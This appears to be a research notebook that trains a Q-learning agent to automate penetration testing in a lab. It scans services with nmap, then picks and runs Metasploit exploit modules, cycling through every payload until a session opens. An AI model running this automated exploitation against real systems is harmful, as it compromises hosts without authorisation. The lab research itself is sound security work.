In [ ]:
from pymetasploit3.msfrpc import *
import nmap3
import inspect
import nmap3
import lxml
import json
from bs4 import BeautifulSoup
import numpy as np
import pandas as pd
import random
import re
import time
from matplotlib import pyplot as plt

## Q-learning Testing Enviroment

In [ ]:
def state_loading(state):
    if state == "end":
        return state
    state_in_string = ""
    state_in_string = str(state[0]) + ' ' + str(state[2]) + ' ' +  str(state[3])
    filted_state = state_in_string.replace('None', '')
    return filted_state

def load_all_exploit():
    new_module_list = []
    for x in client.modules.exploits:
        module = 'exploit/' + x
        new_module_list.append(module)
    return new_module_list

def load_all_auxiliary():
    new_module_list = []
    for x in client.modules.auxiliary:
        module = 'auxiliary/' + x
        new_module_list.append(module)
    return new_module_list

def load_all_auxiliary():
    new_module_list = []
    for x in client.modules.auxiliary:
        module = 'auxiliary/' + x
        new_module_list.append(module)
    return new_module_list

# search target service return with a service list
def search_service(ip):
    nmap = nmap3.Nmap()
    version_result = nmap.nmap_version_detection(ip)
    result = []
    for x in version_result[target]["ports"]:
        result.append([x.get('service').get('name'), x.get('portid'), x.get('service').get('product'), x.get('service').get('version')])
    return result

# kill all session, destroy console and set state to init
def reset():
    global console_cid
    global env_state
    client.consoles.console(console_cid).write('sessions -K')
    env_state = 'init'
    return env_state

#check the action seccss create a session
def check_success():
    success = False
    session = client.sessions.list.keys()
    if len(session) != 0:
        success = True
        client.consoles.console(console_cid).write('sessions -K')
    return success

# fill parameter of the exploit module
def fill_requirement(exploit):
    filled_exploit = exploit
    for x in exploit.missing_required:
        if x == 'RHOSTS':
            filled_exploit['RHOSTS'] = target
        if x == 'RHOST':
            filled_exploit['RHOST'] = target
    return filled_exploit

# execute the exploit module with brute force the payload
def perform_action(action):
    if 'exploit' in action:
        exploit = client.modules.use('exploit', action)
        filled_exploit = fill_requirement(exploit)
        for x in filled_exploit.targetpayloads():
            try:
                filled_exploit.execute(payload=x)
            except Exception:
                print ('Payload Exception:', Exception)
                pass
    if 'auxiliary' in action:
        exploit = client.modules.use('auxiliary', action)
        exploit.execute()
        
# load all the possible action (modules) about the service        
def load_action_set(service):
    global console_cid
    pattern = re.compile(r'\bexploit\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80}', flags=re.I | re.X)
    #pattern = re.compile(r'(\bauxiliary\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80}|\bexploit\b/[\w]{1,80}/[\w]{1,80}/[\w]{1,80})', flags=re.I | re.X)
    result = []
    search_vairable = service[2]
    if search_vairable == None:
        search_vairable = service[0]
    if '/' in search_vairable:
        multi_vairable = search_vairable.split("/")
        for x in multi_vairable:
            command = 'search ' + x
            client.consoles.console(console_cid).write(command)
            x = client.consoles.console(console_cid).read()
            result = result + pattern.findall(x['data'])
    else:
        command = 'search ' + search_vairable
        client.consoles.console(console_cid).write(command)
        x = client.consoles.console(console_cid).read()
        result = pattern.findall(x['data'])
    return result

In [ ]:
client = MsfRpcClient('1234', port=55553, server='172.18.0.7')

In [ ]:
target = '172.18.0.9'
all_action = load_all_exploit()# + load_all_auxiliary()
console_cid = client.consoles.console().cid

env_state = 'init'
env_current_action_set = []
env_all_target_service = []
env_action_set = []
env_reward = 0
env_chech_exploit = False
state_count = 0
track_state = ""

exploited_module = []

def env_step(action):
    global env_state
    global env_action_set
    global env_all_target_service
    global env_reward
    global target
    
    global state_count
    global track_state
    
    global exploited_module
    
    if env_state == 'init':
        env_all_target_service = search_service(target)
        if len(env_all_target_service) > 1:
            env_state = env_all_target_service.pop(np.random.choice(len(env_all_target_service)-1))
            env_action_set = load_action_set(env_state)
        elif len(env_all_target_service) == 1:
            env_state = env_all_target_service.pop()
        else:
            env_state = 'end'
            
    while len(env_action_set) > 30:
        env_action_set.pop(np.random.choice(len(env_action_set)-1))

    if action != '':
        perform_action(action)
        if action in env_action_set:
            env_action_set.remove(action)

    chech_exploit = check_success()
    
    # reward function
    if chech_exploit == True:
        env_reward = 100
        print ('Exploited: ', state_loading(env_state), action, env_reward)
        exploited_module.append(action)
        if len(env_all_target_service) > 1:
            env_state = env_all_target_service.pop(np.random.choice(len(env_all_target_service)-1))
            env_action_set = load_action_set(env_state)
        elif len(env_all_target_service) == 1:
            env_state = env_all_target_service.pop()
            env_action_set = load_action_set(env_state)
        else:
            env_state = 'end'
            
        chech_exploit = False
        
        return env_action_set, state_loading(env_state), env_reward
    
    elif chech_exploit == False:
        env_reward = -1
    else:
        env_reward = 0
    
    if track_state == state_loading(env_state):
        if state_count > 3:
            if len(env_all_target_service) > 1:
                env_state = env_all_target_service.pop(np.random.choice(len(env_all_target_service)-1))
                env_action_set = load_action_set(env_state)
            elif len(env_all_target_service) == 1:
                env_state = env_all_target_service.pop()
            else:
                env_state = 'end'
        else:
            state_count += 1
    else:
        track_state = state_loading(env_state)
        state_count = 1
        
    return env_action_set, state_loading(env_state), env_reward

# Q-Learning Table

In [ ]:
def check_state_exist(state):
    global RL_Qtable
    state_in_string = state
    if state_in_string not in RL_Qtable.index:
        RL_Qtable = RL_Qtable.append(
                pd.Series(
                    [0]*len(RL_Qtable.columns),
                    index=RL_Qtable.columns,
                    name=state_in_string,
                )
        )
    return state_in_string

def Qlearn(action, state, reward):
    learning_rate=0.01
    global RL_Qtable
    check_state_exist(state)
    q_predict = RL_Qtable.loc[state, action]
    q_target = reward
    RL_Qtable.loc[state, action] += learning_rate * (q_target - q_predict)
    
def choose_action(state, actions):
    global RL_Qtable
    e_greedy=0.1
    state_in_string = check_state_exist(state)
    random = np.random.uniform()
    if random > e_greedy or len(actions) == 0:
        state_action = RL_Qtable.loc[state_in_string, :]
        action = np.random.choice(state_action[state_action == np.max(state_action)].index)
    else:
        action = np.random.choice(actions)
    return action

In [ ]:
def store_Qtable():
    global RL_Qtable
    RL_Qtable.to_pickle("Qtable.pkl")
    
def load_Qtable():
    RL_Qtable = pd.read_pickle("Qtable.pkl")
    return RL_Qtable

In [ ]:
RL_Qtable = load_Qtable()

## Running Enviroment

In [ ]:
acumulate_reward_list = []

def RunRL():
    state = reset()
    action_set = []
    reward = 1
    acumulate_reward = 50
    global acumulate_reward_list
    global exploited_module
    while True:
        # RL choose action based on observation
        action = choose_action(state, action_set)

        # RL take action and get next observation and reward
        action_set, state, reward = env_step(action)
            
        acumulate_reward = acumulate_reward + reward
        acumulate_reward_list.append(acumulate_reward)

        # break while loop when end of this episode
        if state == 'end':
            print('Finish of Training, exploited modules: ')
            exploited_module = list(dict.fromkeys(exploited_module))
            for x in exploited_module:
                print (x)
            return

In [ ]:
RunRL()

In [ ]:
plt.plot(acumulate_reward_list)
plt.xlabel("step")
plt.ylabel("reward")
plt.show()